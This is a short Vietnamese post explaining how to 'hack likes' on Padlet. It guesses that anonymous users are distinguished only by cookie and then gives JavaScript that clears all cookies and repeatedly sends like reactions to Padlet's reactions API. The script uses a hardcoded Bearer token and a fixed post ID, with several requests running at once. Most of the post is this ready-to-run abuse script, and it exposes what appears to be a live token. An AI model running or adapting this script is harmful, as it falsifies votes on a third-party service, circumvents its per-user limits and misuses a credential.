Tác giả: Sơn Đẹp Zai
Padlet cho phép người dùng chưa có tài khoản like hoặc đăng bài. Từ đây theo kinh nghiệm mình đoán rằng là Padlet sẽ chỉ sử dụng cookie để phân biệt người dùng chứ không check ip người dùng
Từ đây để hack like Padlet ta chỉ cần delete cookie và mỗi lần gửi request ta thêm header thành phần authorization để nó có thể dùng cookie mới tạo
function deleteAllCookies() {
var cookies = document.cookie.split(";");
for (var i = 0; i < cookies.length; i++) {
var cookie = cookies[i];
var eqPos = cookie.indexOf("=");
var name = eqPos > -1 ? cookie.substr(0, eqPos) : cookie;
document.cookie = name + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT";
}
}
var numCoreMain = 0, numLikeMain = 0;
function hackLike() {
if(numCoreMain > 0 && numLikeMain > 0){
numLikeMain--;
deleteAllCookies();
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4) {
numCoreMain++;
}
};
xhttp.open("POST", "https://padlet.com/api/5/reactions", true);
xhttp.setRequestHeader("authorization", "Bearer 8f0dd8c4bc29bc774a88917c9d369196aa318f88098eea014f98f18567415371");
xhttp.setRequestHeader("Content-type", "application/json; charset=utf-8");
xhttp.send(JSON.stringify({"wish_id":2074989648,"value":1,"reaction_type":"like"}));
numCoreMain--;
}
if(numLikeMain > 0) setTimeout(hackLike, 0);
}
function smartHack(numLike, numCore = 5){
numCoreMain = numCore;
numLikeMain = numLike;
for(var i = 1; i<=Math.min(numCore, numLike); i++){
hackLike();
}
}
//Number like, Number processer
smartHack(10, 5);